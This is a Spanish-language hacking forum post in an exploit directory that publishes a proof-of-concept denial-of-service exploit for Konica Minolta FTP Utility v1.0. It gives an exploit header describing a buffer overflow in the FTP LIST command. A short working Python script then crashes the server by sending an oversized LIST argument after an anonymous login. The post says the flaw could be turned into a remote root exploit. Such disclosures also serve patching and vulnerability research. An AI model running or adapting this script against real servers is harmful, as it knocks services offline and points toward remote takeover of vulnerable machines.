Mostrando resultados del 1 al 1 de 1

Tema: Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) [by Socket_0x03]

  1. #1
    Habitual Avatar de Socket_0x03
    Fecha de Ingreso
    mayo-2007
    Ubicación
    Ciberespacio
    Mensajes
    249
    Gracias obtenidos: 103

    Post Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) [by Socket_0x03]

    Código:
    # Exploit Title: Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) 
    # Date: [05-16-2020]
    #
    # Found by: Alvaro J. Gene (Socket_0x03)
    # Email: Socket_0x03 (at) teraexe (dot) com
    # Website: www (dot) teraexe (dot) com
    # 
    # Software Link: [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]
    # Vulnerable Application: Konica Minolta FTP Utility
    # Version: 1.0
    # Server: FTP Server
    # Vulnerable Command: LIST
    # Tested on: Windows 7 SP1
    # 
    # Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server
    # "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
    # such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
    # some registers, an individual can use the vulnerable command to build a remote buffer 
    # overflow exploit that will root a system without any user interaction. 
    # 
    # References:
    # [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]
    # [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]
    # [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]
    # [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]
    # [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]
    
    
    from ftplib import FTP
    
    ftp = FTP('192.168.0.16')
    
    buffer = "A" * 1500
    
    ftp.login()
    
    ftp.retrlines('LIST ' + buffer)
    Última edición por Socket_0x03; 22-may-2020 a las 13:54
    [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]

Temas Similares

  1. Respuestas: 0
    Último mensaje: 19-may-2020, 14:14
  2. Filetto v1.0 - 'FEAT' Denial of Service (PoC) [by Socket_0x03]
    By Socket_0x03 in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 19-may-2020, 14:13
  3. HomeFtp v1.1 Denial of Service
    By Doddy in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 28-feb-2009, 23:51
  4. Denial of Service
    By Doddy in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 12-feb-2009, 01:34
  5. Denial of service
    By Anubiz_thot in forum HacK GeneraL
    Respuestas: 1
    Último mensaje: 23-may-2007, 18:45

Normas de Publicación

  • No puedes crear nuevos temas
  • No puedes responder mensajes
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •